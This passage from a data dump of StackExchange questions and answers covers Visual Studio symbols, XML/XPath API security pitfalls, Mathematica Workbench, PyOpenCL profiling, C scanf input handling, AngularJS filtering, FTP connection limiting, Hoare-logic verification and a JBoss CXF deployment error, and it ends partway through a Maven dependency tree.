Ultimate\n\nQuestion: Hi i wrote a simple code in Visual Studio 2010.\n<code>#include \"stdafx.h\"\n\nint _tmain(int argc, _TCHAR* argv[])\n{\n printf(\"Lakshmen\");\n return 0;\n}\n<\/code>\nI ended up having these errors:\n<code>'Lakshmen.exe': Loaded 'C:\\Users\\User\\Documents\\Visual Studio 2010\\Projects\\Lakshmen\\Release\\Lakshmen.exe', Symbols loaded.\n'Lakshmen.exe': Loaded 'C:\\Windows\\SysWOW64\\ntdll.dll', Cannot find or open the PDB file\n'Lakshmen.exe': Loaded 'C:\\Windows\\SysWOW64\\kernel32.dll', Cannot find or open the PDB file\n'Lakshmen.exe': Loaded 'C:\\Windows\\SysWOW64\\KernelBase.dll', Cannot find or open the PDB file\n'Lakshmen.exe': Loaded 'C:\\Windows\\SysWOW64\\msvcr100.dll', Symbols loaded.\nThe program '[13376] Lakshmen.exe: Native' has exited with code 0 (0x0).\n<\/code>\nAnswer: You could get the symbols from Microsoft.\nTools->Options->Debugging->Symbols and check Microsoft Symbol Server and in the Cache symbols in the directory text box below, enter a path to a directory where you want to cache these symbols.\n","meta":{"source":"stackoverflow","title":"Simple code in Visual Studio 2010 Ultimate","dup_signals":{}},"subset":"stackexchange"} +{"text":"Single Page Application with REST API backend based on XML, queried by dynamic XPath\n\nQuestion: A web application I'm developing will be a Single Page Application (SPA) that will interact with a REST API backend, through <code>jQuery.ajax()<\/code> calls.\nThe SPA and API will both be served over an https\/TLS connection. The API will be served from a subdomain of the SPA domain:\n<code>SPA: example.org\nAPI: api.example.org\n<\/code>\n... and will respond with the appropriate CORS headers:\n<code>Access-Control-Allow-Origin: example.org\nAccess-Control-Allow-Methods: GET, POST, etc. \/\/ whatever applicable to the requested resource\nAccess-Control-Allow-Headers: Accept, Authorization, Content-Type\n<\/code>\nUpon logging into the SPA the user (an organisation) will be served its unique associated sha1 <code>API-key<\/code> (either in a cookie or as a global javascript variable), that the SPA will use for interacting with the API, for the duration of the login session of the user. The SPA will issue this <code>API-key<\/code> in each request to the API in an <code>Authorization<\/code> header:\n<code>Authorization: MyAppsApi apikey=<API-key>\n<\/code>\nThe REST API's persistence storage will be XML based. I haven't decided on an actual storage mechanism vendor yet (considering using eXistdb, at the moment). In this early stage of development, however, I'm simply using PHP's <code>DOMDocument<\/code> and <code>DOMXPath<\/code>, with no concurrent read\/write capabilities.\nThe REST API will furthermore dynamically generate XPath queries, based on the received request-URI's path. Communication between the SPA and API will probably be done in JSON, though.\nConsider this example XML document:\n<code><?xml version=\"1.0\" encoding=\"utf-8\"?>\n<organisations>\n <organisation id=\"1\">\n <apiKey>some hex sha1 digest<\/apiKey>\n <products>\n <product id=\"1\">\n <parts>\n <part id=\"1\">\n <subParts>\n <subPart id=\"1\">\n ...\n <\/subPart>\n <\/subParts>\n <\/part>\n <\/parts>\n <\/product>\n <\/products>\n <\/organisation>\n <organisation id=\"2\">\n <apiKey>another hex sha1 digest<\/apiKey>\n <products>\n ...\n <\/products>\n <\/organisation>\n<\/organisations>\n<\/code>\nCurrently, this document is validated by a custom XSD schema.\nThe REST API will first determine if an <code><organisation><\/code> node with the issued <code><apiKey><\/code> exists before interacting further with the XML. If the <code><organisation><\/code> node is found, it will be used as the context node for any further XPath queries.\nThe request-URI paths will be restricted by the following regex pattern:\n<code>~\\G(\/(?<collection>[a-z]+)(?:\/(?<resourceId>\\d+))?)(?:(?=(?1))|\/?$)~\n<\/code>\nallowing only <code>\/<loweralpha>+(\/<digit>+)?<\/code> segments\nConsider these example request-URI paths and their dynamically generated XPath:\n<code>\/products\/1 => .\/\/products\/*[@id=\"1\"]\n\/parts\/1 => .\/\/parts\/*[@id=\"1\"]\n\/products\/1\/parts\/1 => .\/\/products\/*[@id=\"1\"]\/parts\/*[@id=\"1\"]\n<\/code>\nAs you can see, they will be relative to the <code><organisation><\/code> context node.\nConsidering that I haven't fully investigated the typical workings of XML backends yet, it may very well turn out that my above XML setup is flawed to begin with, in that I should create an XML document per organisation, mitigating the risk of accessing nodes that do not belong to the <code><organisation><\/code> context node.\nHowever, do you see any inherent flaws in this current set-up?\nIn my current set-up I am mostly concerned about the dynamic XPath querying that could turn out to be too risky. Perhaps an adversary is able to sneak in XPath axes, somehow? But I'm interested to hear about any other possible flaws as well.\nThank you.\nPS.: perhaps I should have clarified more what the risks are, that I am most concerned with:\n\nCan an adversary somehow obtain the API-key of an(other) organisations?\nCan an adversary somehow manipulate content of an(other) organisations?\nComment: To whoever close-flagged this as \"too broad\", a long question does not make a question too broad. There are some clear and answerable questions here: what vulnerabilities are potentially present in this use of XPath and XML. The one close reason I could understand is the one relating to breaking a specific question, but I think that's arguable either way. I consider this a well-enough written and fleshed out question to remain here.\nAnswer: Your primary problem when handling client-provided is going to be XML External Entities (XXE) attacks. Systems with such vulnerabilities can often be exploited to read files or enumerate the internal network which the server is on. In PHP you can help fix this by calling <code>libxml_disable_entity_loader(true);<\/code> in order to disable external entities.\nAnother problem is, potentially, the Billion Laughs attack. This is a CPU and memory exhaustion DoS attack which uses nested element type declarations. This SO question should give you a good idea on how to pre-validate XML before loading it to avoid this kind of attack, but the short answer is that libxml allows you to set a custom DTD validator \/ loader callback.\nYou may also want to consider XPath Injection, though I'm not sure how critical this would be in your use-case. It's hard to tell what kind of impact it might have on your system's business logic without having a wider understanding of the application.\nComment: @DecentDabbler In regards to the two additional questions, it's not something anyone here can answer. It's something that would be investigated interactively during a penetration test against the application (in fact, I quite regularly see questions such as this raised in statements of work in my day job). Regarding the JSON part, it's a much safer format in terms of its use for data storage and transfer - XML is an immensely complex markup language and its use for data storage is the result of many a vulnerability.\nComment: @DecentDabbler That said, look into [object injection](https:\/\/www.owasp.org\/index.php\/PHP_Object_Injection) attacks and the [security issues around unserialising untrusted data](https:\/\/www.owasp.org\/index.php\/Deserialization_of_untrusted_data). Both of these are of critical importance if you're deserialising this data into objects, from either XML or JSON, without appropriate checks. Again, if possible, avoid this kind of behaviour where possible due to its complexity and tendency for security bugs - manually pull out fields from the input data and fill the objects.\nComment: Great stuff! These are exactly the type of pointers I was hoping to receive to this question. Thanks! By the way, maybe I should have mentioned that I'm not entirely sure yet whether the SPA will receive\/send XML as well. It could very well be that I will translate the XML to JSON and vice versa. But the persistence storage will remain XML. Another thing that is relevant to mention is that I'm currently validating the validity of the XML document with a custom XSD schema. I'll add this to my question. I'll investigate your suggestions further to see how they apply to my set-up. Thanks again!\nComment: About my additional questions: fair enough. However, I should mention that, as far as I'm concerned, they can just be seen in the context of the information that I have currently provided, leaving out of consideration other possible security risks such as system administration flaws, network configuration flaws, etc. Concerning your last remark about XML storage, other than the information you have already provided, do you know of any good sources (articles, etc.) that discuss why XML storage is so vulnerable?\nComment: Thanks. I was aware of object injection and unserialising indeed.\nComment: @DecentDabbler Just a quick Google search for \"XML vulnerabilities\" should give you an example, but the point is that there's so much to XML above and beyond its ability to store data in a nested structure. The more features and complexity you add, the more potentially vulnerable code there is. The fact that Wikipedia has [an entire category for XML](https:\/\/en.wikipedia.org\/wiki\/Category:XML) should give you an idea of how bloated the format and standard has become.\nComment: Will do! The critique about it being considered bloated, I was already aware of. And even though I kind of agree, for my intended application it appears to be more fitting than, for instance, a relational database. Anyway, I'll have to investigate eXistDB, or other XML backends as well, to see what they have to say\/to offer in terms of mitigating security risks. In any case, thanks again for your valuable insights!\n","meta":{"source":"security.stackexchange","title":"Single Page Application with REST API backend based on XML, queried by dynamic XPath","dup_signals":{}},"subset":"stackexchange"} +{"text":"Plotting\/Visualization in Workbench?\n\nQuestion: I would like to ask a question with Mathematica Workbench.\nThe workbench is based on Eclipse. Of course, it would have no problem to add breakpoints and debug, but I wonder if it is possible to provide the advanced plotting\/visualization as in a Mathematica notebook?\nI remember once reading in the Mathematica documentation which said a significant portion of code needs to be rewritten for each platform (Windows, Linux, OS X) for the graphics frontend (i.e., to implement interactive notebooks), and I suspect that it will never be possible to have such support in Eclipse.\nSo what is the typical workflow when using Workbench? Perhaps it was never intended to provide the level of visualization as a Mathematica notebook, and WRI actually wishes users to \n\nDebug\/test individual modules in a Mathematica notebook, and then\nwrap it, exposing certain functions\/interfaces like the standard\nsoftware engineering procedure. \nWorkbench is intended to be organize projects, like Wolfram Alpha, containing dozens or more such complex modules.\nAnswer: I do not know where you got the idea that interactive notebooks are platform-specific. This simply isn't true. \nThe way the Workbench projects work is that you develop packages (<code>.m<\/code> files) in the Eclipse editor, but you can include notebooks (<code>.nb<\/code> files) in the project for testing, visualisation, interactive use of the front end or whatever. \nSo if you want plotting, visualisation or interactive features such as the <code>Manipulate<\/code> function, you need a notebook file, but you can include these files in a Workbench project and launch the Mathematica front end from the Eclipse-based interface. \nComment: Sorry for not being clear enough. I meant that the screen graphics rendering part of MMA needs is platform specific which I read in the help; this might already obsolete because the front end is possible to be written in Java, but I am unsure whether it is the case due to performance concerns. This is not the actual question :) @Verbeia\nComment: So if I want to use like `manipulate` `plot` do you mean that I can simply add such lines in **.nb** file, include in a Workbench project, and when running to the `manipulate` `plot` lines the Workbench will call MMA to display the graph? @Verbeia @m_goldberg\nComment: No, I mean tht you can launch the notebook from the Eclipse \/ Workbench project, which launches the Mathematica front end, and you can run the `Manipulate` (Note - case-sensitive!!) from there, possibly calling functions you have written in the `.m` file. The front end is provided; it is called Mathematica.\n","meta":{"source":"mathematica.stackexchange","title":"Plotting\/Visualization in Workbench?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Use GPU profiler (for example CodeXL) together with PyOpenCL\n\nQuestion: I have my complex PyOpenCL app with a lot of buffers creations, kernel templating and etc. I want to profile my app on GPU to see what is the bottle neck in my case.\nIs it possible to use some gpu profiler with PyOpenCl app? For example CodeXL.\nP.S. I know about event profiling but it isn't enough.\nAnswer: Yes, it is possible. Look here: http:\/\/devgurus.amd.com\/message\/1282742\n","meta":{"source":"stackoverflow","title":"Use GPU profiler (for example CodeXL) together with PyOpenCL","dup_signals":{}},"subset":"stackexchange"} +{"text":"C application skips my scanf calls\n\nQuestion: I'm trying to write code to count how many times a string repeats inside another one. (If there is some easier approach, please let me know.)\nHere is the code that I have now:\n<code>int getStringLenght (char str[]) {\n int lenghtOfTheString;\n int i;\n for (i = 0; i < 100; i++) {\n if(str[i] == '\\0') {\n lenghtOfTheString = i;\n break;\n }\n }\n return lenghtOfTheString;\n}\nint main()\n{\n printf(\"Type a string: \");\n char T[1024];\n scanf(\"%s\",&T);\n char P[100];\n printf(\"Type a substring: \");\n scanf(\"%s\",&P);\n printf(\"%s\",P);\n int stringSize = getStringLenght (P);\n int occurences = 0;\n int i;\n for (i = 0; i < 10; i++) {\n int j;\n\n if(T[i] == P[0]) {\n for (j = 0;j<10;j++) {\n char c1 = T[i+j];\n char c2 = P[j];\n if(c1 != c2) {\n\n break;\n }\n if(j == stringSize-1) {\n occurences++;\n \/\/printf(\"string iguais em i = %d\",i);\n }\n }\n }\n }\n printf(\"\\nThe substring %s was found %d times\", P, occurences);\n\n return 0;\n}\n<\/code>\nThe app compiles. When I type \"banana\", for example, on the first <code>scanf<\/code>, and then \"na\" on the second, the app comes out with the right answer. But, if I type \"banana and milk\" on the first <code>scanf<\/code>, it automatically interprets the second <code>scanf<\/code> as \"and\", even when I don't type anything but \"banana and milk ENTER\"\nWhat's happening?\nComment: Try `sscanf` instead of `scanf` in your code.\nAnswer: <code>scanf<\/code>'s \"%s\" conversion only reads characters until it encounters white-space (e.g., space, new-line, or tab). When you enter more than one word, it reads the first. The second call reads the second, and so on.\nIf you want to read an entire line, you usually want to use <code>fgets<\/code> instead (<code>scanf<\/code> can do the job as well, but it's a little trickier, and uses a feature of which many are unaware, so they often find it difficult to understand).\nComment: Wait, scanf can be made to not stop on whitespace? Pray tell!\nComment: @RichardJ.RossIII: Yes. `char your_string[256]; scanf(\"%255[^\\n]%c\", your_string, &some_char);` Note that (to avoid being essentially identical to `gets`) you need to supply the size. Also note that the size you supply needs to be one less than the size of the array. As I've done it here, the `some_char` will normally hold a new-line, but the line was longer than you allowed for, it'll be the next character.\nComment: fgets does work, but now my string contains a newline inside it. is there some way to remove it?\nComment: @Lucas: Several. One easy (but unconventional) one is: `strtok(your_string, \"\\n\");`. A bit more work, but more conventional, is `char *pos = strchr(string, '\\n'); if (pos!=NULL) *pos = '\\0';`\nAnswer: You don't understand how scanf works. http:\/\/www.cplusplus.com\/reference\/clibrary\/cstdio\/scanf\/ <code>%s<\/code> will only read one string, terminated by white space. If you want to keep reading strings, or read a line, you have to keep using scanf until one of your strings ends in a new line or EOF, or use another function, like <code>fgets<\/code>.\nComment: `cplusplus.com` can't seem to get anything quite right (in this case, their description doesn't even mention scanset conversions).\nAnswer: You have to remember that many functions are already implemented. This is why your <code>getStringLength<\/code> (you have typo in it's name) is needless. You can simply check the string's length using <code>strlen<\/code> function from <code>string.h<\/code>. What is more when you import this file you also have access to <code>strstr<\/code> function which finds the first occurrence of a given substring in a string. Try to use them instead of reinventing the wheel ;) \nComment: All good advice, but should probably be a comment, as it does nothing to (even try to) answer the question.\nAnswer: That is a standart problem with <code>scanf<\/code>. There are 3 ways to fix this:\n\n1: Call fflush after each scanf:\n<code>scanf(\"%s\", some_string); \/\/ you don't need to write &some_string because giving a array to a function automatically converts it to a pointer\nfflush(stdin);\n<\/code>\n<code>fflush()<\/code> isn't available on every system.\n\n2: Putting scanf in a loop:\n<code>do\n scanf(\"%s\", somestring);\nwhile (getchar() != '\\n');\n<\/code>\n\n3: Don't use scanf! Use fgets and sscanf!\n<code>char buffer[100]; \/\/ buffer for fgets()\nfgets(buffer, 100, stdin); \/\/ read a line from stdin (standart input) into buffer\nsscanf(buffer, \"%s\", some_string); \/\/ convert buffer in any format you want\n<\/code>\n","meta":{"source":"stackoverflow","title":"C application skips my scanf calls","dup_signals":{}},"subset":"stackexchange"} +{"text":"AngularJS filter list case insensitive\n\nQuestion: I have a list of subjects and i want to search through my list and return valid results but it is case senstive and doesnt return the correct results \n<code>var subjects = [\n {id: '1', name: 'Maths'}, \n {id: '2', name: 'English'},\n {id: '3', name: 'Physics'}\n]; \n\nvar returnValue = { items: [] };\nsubjects.forEach(function(item){\n\n if (item.name.indexOf(query) > -1 ){\n returnValue.items.push(item);\n }\n else if (item.id.indexOf(query) > -1 ){\n returnValue.items.push(item);\n }\n});\nconsole.log(returnValue)\n<\/code>\nSo for example if i enter the text 'm', when it searches the list of subjects it should return Maths but right now it returns nil but if i input 'M', then it returns the subject Maths. \nAny help on solving this? Much appreciated. \nAnswer: You can always convert the comparison values to lowercase and then compare.\n<code>ar subjects = [\n {id: '1', name: 'Maths'}, \n {id: '2', name: 'English'},\n {id: '3', name: 'Physics'}\n]; \n\nvar returnValue = { items: [] };\nsubjects.forEach(function(item){\n\n var itemNameLower = item.name.toLowerCase();\n var queryLower = query.toLowerCase();\n\n if (itemNameLower.indexOf(queryLower) > -1 ){\n returnValue.items.push(item);\n }\n else if (item.id.indexOf(queryLower) > -1 ){\n returnValue.items.push(item);\n }\n});\nconsole.log(returnValue)\n<\/code>\nComment: probably using a filter `item in items | filter : searchText : false`\nComment: that would have been my answer\nComment: @avijit thnks but i would prefer case insensitive rather than doing this\nComment: @Gianmarco is there no other way to handle this, angularjs style?\nComment: @KingsleySimon You may be looking for something like this: http:\/\/stackoverflow.com\/questions\/18082017\/angularjs-filter-case-insensitive\nComment: @Gianmarco The default value is already `false`, it need not be set explicitly. `ng-repeat=\"item in items | filter : searchText\"` should also work in an insensitive manner.\nComment: just give it a shot and verify ;)\nComment: @AvijitGupta i cant use filter due to the plugin tht i am using to execute this.\n","meta":{"source":"stackoverflow","title":"AngularJS filter list case insensitive","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can I restrict users' connection attempts to my FTP server?\n\nQuestion: Is there any way possible to restrict user to make a connection to the FTP server on my Windows XP computer? \nI have an FTP server established in Windows XP and now I want to make access to that FTP server restricted to deny brute force attacks. \nIf the machine was Linux then I would use an iptables chain to restrict users' connection attempts, for example to deny user after 6 connection attempts in one second. \nSo can I do this in Windows?\nComment: There is the Windows firewall or the FTP server allowed\/denied IP addresses. Also FTP under Windows uses NTFS permissions, are you using FAT or NTFS for your file system?\nComment: I want windows firewall and I am using NTFS as file system.\nComment: Updated to make the question more readable, and to use appropriate tags. Please have a look to check I kept the meaning you intended.\nComment: While I am not sure about Windows Firewall on Windows XP, I do know that Windows 10 firewall allows you to create a block all except rule for either your outbound or inbound traffic.\n\nI am not sure about FTP being a specific protocol on the list, but you can make an ANY protocol; ANY IP; rule and white-list the IPs of your clients.\n\nSide Note: Win XP is EOL. If you are hosting an FTP server, I highly recommend that you go ahead and upgrade your OS either to some Linux distro or take the free win 10 upgrade.\nAnswer: Have you thought about just using the windows firewall API? Should give you more than enough control based on what you are trying to do.\nComment: But how can I do that ?\nAnswer: Windows XP's firewall does not do the connection-limiting that you are asking for. \nTo limit the number of connections, you would have to use a different firewall that had that feature, or look to see if the FTP server you are using had a similar feature. \nFree Windows FTP Server: FileZilla\nTo limit incoming connections in FileZilla: File -> Site Manager -> Transfer Settings -> Limit number of simutaeous connections\nComment: Can you give me some of the tools ?\nAnswer: First of all you have to keep in mind that Windows XP's built-in firewall doesn't have the capability to apply the rules you described. Plus, even if it did, packets would still get dropped by the same machine that's handling the actual FTP connections, so it would still be recommendable to put a separate firewall (or Linux box) in front of it, just for firewall\/NAT purposes.\nOn top of that, using Windows XP's built-in FTP server is also not a good idea, as it's too integrated with the OS and it would force you to create OS user profiles and manage ACLs through NTFS permissions. Therefore I would opt for a different type of server, with FileZilla Server and Syncplify.me Server! being two of such options.\nFileZilla Server is free for any use, and allows you to limit the number of simultaneous connections. Syncplify.me Server! is free for personal use, but the paid editions allow you to limit not only the number of simultaneous connections but also how many of them are allowed from the same IP address, and how many \"attempts\" are allowed in how much time (window) before automatic temprary\/permanent blacklisting.\n(Disclaimer: I am the author of Syncplify.me Server)\n","meta":{"source":"security.stackexchange","title":"How can I restrict users' connection attempts to my FTP server?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to verify that function with Hoare Triple?\n\nQuestion: As the title says, how can I verify the function below with the Hoare Triple? I read various lectures about it but I can't figure out how to do it.\n<code>int uguaglianza_insiemi(elem_lista_t *insieme_A,\n elem_lista_t *insieme_B)\n{\n int esito; \n\n if ((insieme_A == NULL) && \n (insieme_B == NULL))\n esito = 1;\n\n else if (insieme_A == NULL ||\n insieme_B == NULL)\n esito = 0;\n\n else if (insieme_A->valore != insieme_B->valore) \n esito = 0;\n\n else esito = uguaglianza_insiemi(insieme_A->succ_p,\n insieme_B->succ_p);\n\n return (esito);\n}\n<\/code>\nComment: You need to write the preconditions P and the postconditions Q and prove that if the precponditions are met, the postcondition will hold after the processing. For example, a precondition is that `insiema_A` and B are either null or point to a valid list element.\nComment: So i need to write and set a Preconditions and a Postconditions? In my lecture i read that if the function is recursive, i can also resolve it with the induction metod, i'm a bit confused\nComment: Induction probably means here that if the first invocation was correct, and the program (function) is correct, then every next invocation will be correct. But you still need to write those pre- and post conditions.\nComment: You can write statements or `assert()`s to verify the pre- and post conditions. The only thing the function can't verify is that on first invocation it has been called with pointers, if non-null, to objects that are valid list elements. C allows with casts to invoke the function with garbage pointers.\nComment: Ok thank you for the tip, i only need to understand how to write those conditions, for instance, if i take this precondition you wrote:\"insieme_A and B are either null or point to a valid list element.\" , i must write the post condition related to that pre condition?\nComment: You can write the pre and post conditions either as natural language, or using some formal language, or using C statements.\nComment: I would ask you if you can introduce some examples about my code! Might you do that?\nAnswer: To prevent a long discussion in comments, I'll try to write some pre- and post conditions.\nAs it is not possible to test inside the function whether it is called with pointers to valid list objects, that falls to the parent\/the caller:\n<code>\/\/ The following function must be called with pointers that are either null\n\/\/ or point to valid list elements. The lists must be correct (no malloc bugs etc).\n\/\/ The compiler must have checked that it is called with pointers to the proper types,\n\/\/ as C has no typeof operator.\n\/\/\nint uguaglianza_insiemi(elem_lista_t *insieme_A,\n elem_lista_t *insieme_B)\n{\n int esito; \n\n if ((insieme_A == NULL) && \n (insieme_B == NULL))\n esito = 1; \/\/ both pointers are null: equal\n\n \/\/ not both pointes are null\n else if (insieme_A == NULL ||\n insieme_B == NULL)\n esito = 0; \/\/ not both pointers are null, but one is: not equal\n\n \/\/ neither pointer is null and so they may be dereferenced\n else if (insieme_A->valore != insieme_B->valore) \n esito = 0; \/\/ neither pointer is null, but their element values aer not equal: not equal\n\n \/\/ the function can be called recursively now because its precondition has been met,\n \/\/ that both successor pointers are null or point to valid list elements (induction).\n else esito = uguaglianza_insiemi(insieme_A->succ_p,\n insieme_B->succ_p);\n \/\/ the post condition is that esito reflects equality of both (partial) lists \n return (esito);\n}\n<\/code>\nI hope this is something that you and you professor can work with.\n\n{P}: The function must be called with pointers that are either null or point to valid list elements.\nC: <code>uguaglianza_insiemi( *A, *B)<\/code>\n{Q}: function result reflects equality of the lists\n\nInside the function, this continues with the <code>if<\/code> statement using the rule of composition.\nComment: @Porchetta17 if yu consider the answer useful you should accept it, cf to https:\/\/stackoverflow.com\/help\/someone-answers\n","meta":{"source":"stackoverflow","title":"How to verify that function with Hoare Triple?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Error deploying CXF web service on JBoss\n\nQuestion: I created a CXF web service that runs smoothly on tomcat. When I tried to deploy it on JBoss 5.1 I got the following error:\n<code>10:29:20,476 INFO [LogNotificationListener] Adding notification listener for logging mbean \"jboss.system:service=Logging,type=Log4jService\" to server org.jboss.mx.server.MBeanServerImpl@724a2dd4[ defaultDomain='jboss' ]\n10:29:25,854 ERROR [ProfileDeployAction] Failed to add deployment: [proprietary-jar-1]-1.3.jar\norg.jboss.deployers.spi.DeploymentException: Unable to find class path entry ClassPathEntryImpl{path=[war-name]\/WEB-INF\/lib\/spring-security-core-3.0.7.RELEASE.jar} from [proprietary-jar-1]-1.3.jar\n at org.jboss.deployers.spi.DeploymentException.rethrowAsDeploymentException(DeploymentException.java:49)\n at org.jboss.deployers.vfs.plugins.structure.VFSStructureBuilder.applyContextInfo(VFSStructureBuilder.java:188)\n at org.jboss.deployers.structure.spi.helpers.AbstractStructureBuilder.populateContext(AbstractStructureBuilder.java:82)\n<\/code>\nBoth jars are inside the deployed [WAR-FILE]\/WEB-INF\/lib.\nI've read a bunch or articles on class loading isolation levels, cxf and web-service integration on JBOSS (how to turn off web services stack), but nothing seems to solve this..\nhere goes the war project dependency tree:\n<code>[INFO] --- maven-dependency-plugin:2.8:tree (default-cli) @ application ---\n[INFO] [war project]:3.8.1-SNAPSHOT\n[INFO] +- [proprietary-jar-2]:compile\n[INFO] | +- commons-dbcp:commons-dbcp:jar:1.2.1:compile\n[INFO] | | +- commons-collections:commons-collections:jar:3.2.1:compile (version managed from 2.1)\n[INFO] | | +- commons-pool:commons-pool:jar:1.3:compile (version managed from 1.2)\n[INFO] | | +- xml-apis:xml-apis:jar:1.0.b2:compile\n[INFO] | | \\- xerces:xercesImpl:jar:2.4.0:compile (version managed from 2.0.2)\n[INFO] | +- commons-httpclient:commons-httpclient:jar:3.1:compile\n[INFO] | | +- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | | \\- commons-codec:commons-codec:jar:1.8:compile (version managed from 1.2)\n[INFO] | +- commons-io:commons-io:jar:1.4:compile\n[INFO] | +- commons-lang:commons-lang:jar:2.3:compile\n[INFO] | +- log4j:log4j:jar:1.2.14:compile\n[INFO] | +- [proprietary-jar-3]:2.4.0:compile\n[INFO] | +- [proprietary-jar-4]:compile\n[INFO] | | +- ([proprietary-jar-5]:1.4.0:compile - omitted for duplicate)\n[INFO] | | +- org.springframework:spring-jdbc:jar:3.0.7.RELEASE:compile\n[INFO] | | | +- (org.springframework:spring-beans:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | | +- (org.springframework:spring-core:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | | \\- (org.springframework:spring-tx:jar:3.0.7.RELEASE:compile - version managed from 3.0.6.RELEASE; omitted for duplicate)\n[INFO] | | +- org.hibernate:hibernate:jar:3.2.3.ga:compile\n[INFO] | | | +- net.sf.ehcache:ehcache:jar:1.2.3:compile\n[INFO] | | | | +- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0.4; omitted for duplicate)\n[INFO] | | | | \\- (commons-collections:commons-collections:jar:3.2.1:compile - version managed from 2.1; omitted for duplicate)\n[INFO] | | | +- javax.transaction:jta:jar:1.0.1B:compile\n[INFO] | | | +- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0.4; omitted for duplicate)\n[INFO] | | | +- asm:asm-attrs:jar:1.5.3:compile\n[INFO] | | | +- dom4j:dom4j:jar:1.6.1:compile\n[INFO] | | | +- antlr:antlr:jar:2.7.6:compile\n[INFO] | | | +- cglib:cglib:jar:2.1_3:compile\n[INFO] | | | | \\- (asm:asm:jar:1.5.3:compile - omitted for duplicate)\n[INFO] | | | +- (asm:asm:jar:1.5.3:compile - omitted for conflict with 3.3.1)\n[INFO] | | | \\- (commons-collections:commons-collections:jar:3.2.1:compile - version managed from 2.1.1; omitted for duplicate)\n[INFO] | | +- (hsqldb:hsqldb:jar:184.108.40.206:compile - omitted for duplicate)\n[INFO] | | +- javax.xml.bind:jaxb-api:jar:2.1:compile\n[INFO] | | | +- javax.xml.stream:stax-api:jar:1.0-2:compile\n[INFO] | | | \\- javax.activation:activation:jar:1.1:compile\n[INFO] | | +- org.springframework:spring-aop:jar:3.0.7.RELEASE:compile\n[INFO] | | | +- (aopalliance:aopalliance:jar:1.0:compile - omitted for duplicate)\n[INFO] | | | +- (org.springframework:spring-asm:jar:3.0.7.RELEASE:compile - omitted for duplicate)\n[INFO] | | | +- (org.springframework:spring-beans:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | | \\- (org.springframework:spring-core:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-beans:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-context:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-core:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-orm:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- commons-beanutils:commons-beanutils:jar:1.7.0:compile\n[INFO] | | | \\- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0.3; omitted for duplicate)\n[INFO] | | +- (commons-lang:commons-lang:jar:2.3:compile - omitted for duplicate)\n[INFO] | | +- org.slf4j:slf4j-api:jar:1.5.6:compile\n[INFO] | | +- org.slf4j:slf4j-log4j12:jar:1.5.6:compile\n[INFO] | | | +- (org.slf4j:slf4j-api:jar:1.5.6:compile - omitted for duplicate)\n[INFO] | | | \\- (log4j:log4j:jar:1.2.14:compile - omitted for duplicate)\n[INFO] | | \\- (log4j:log4j:jar:1.2.14:compile - omitted for duplicate)\n[INFO] | +- com.thoughtworks.xstream:xstream:jar:1.2.2:compile\n[INFO] | | \\- xpp3:xpp3_min:jar:22.214.171.124.O:compile\n[INFO] | +- org.springframework.security:spring-security-web:jar:3.0.7.RELEASE:compile\n[INFO] | | +- org.springframework.security:spring-security-core:jar:3.0.7.RELEASE:compile\n[INFO] | | | +- (org.springframework:spring-expression:jar:3.0.6.RELEASE:compile - omitted for conflict with 3.0.7.RELEASE)\n[INFO] | | | +- (org.springframework:spring-core:jar:3.0.7.RELEASE:compile - version managed from 3.0.6.RELEASE; omitted for duplicate)\n[INFO] | | | +- (org.springframework:spring-context:jar:3.0.7.RELEASE:compile - version managed from 3.0.6.RELEASE; omitted for duplicate)\n[INFO] | | | +- (org.springframework:spring-tx:jar:3.0.7.RELEASE:compile - version managed from 3.0.6.RELEASE; omitted for duplicate)\n[INFO] | | | +- (org.springframework:spring-aop:jar:3.0.7.RELEASE:compile - version managed from 3.0.6.RELEASE; omitted for duplicate)\n[INFO] | | | +- (org.aspectj:aspectjrt:jar:1.6.8:compile - omitted for duplicate)\n[INFO] | | | \\- (org.aspectj:aspectjweaver:jar:1.6.8:compile - version managed from 1.6.2; omitted for duplicate)\n[INFO] | | \\- (org.springframework:spring-web:jar:3.0.7.RELEASE:compile - version managed from 2.5.4; omitted for duplicate)\n[INFO] | +- org.springframework:spring-test:jar:3.0.7.RELEASE:compile\n[INFO] | +- struts:struts:jar:1.1:compile\n[INFO] | +- [proprietary-jar-6]:jar:1.0.2:compile\n[INFO] | +- hsqldb:hsqldb:jar:188.8.131.52:compile\n[INFO] | +- net.sf.json-lib:json-lib:jar:jdk15:2.4:compile\n[INFO] | | +- (commons-beanutils:commons-beanutils:jar:1.7.0:compile - version managed from 1.8.0; omitted for duplicate)\n[INFO] | | +- (commons-collections:commons-collections:jar:3.2.1:compile - version managed from 2.1.1; omitted for duplicate)\n[INFO] | | +- (commons-lang:commons-lang:jar:2.3:compile - version managed from 2.5; omitted for duplicate)\n[INFO] | | +- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0.3; omitted for duplicate)\n[INFO] | | \\- net.sf.ezmorph:ezmorph:jar:1.0.6:compile\n[INFO] | | \\- (commons-lang:commons-lang:jar:2.3:compile - version managed from 2.5; omitted for duplicate)\n[INFO] | +- org.owasp.esapi:esapi:jar:2.0.1:compile\n[INFO] | | +- commons-configuration:commons-configuration:jar:1.5:compile\n[INFO] | | | +- (commons-collections:commons-collections:jar:3.2.1:compile - version managed from 3.2; omitted for duplicate)\n[INFO] | | | +- (commons-lang:commons-lang:jar:2.3:compile - 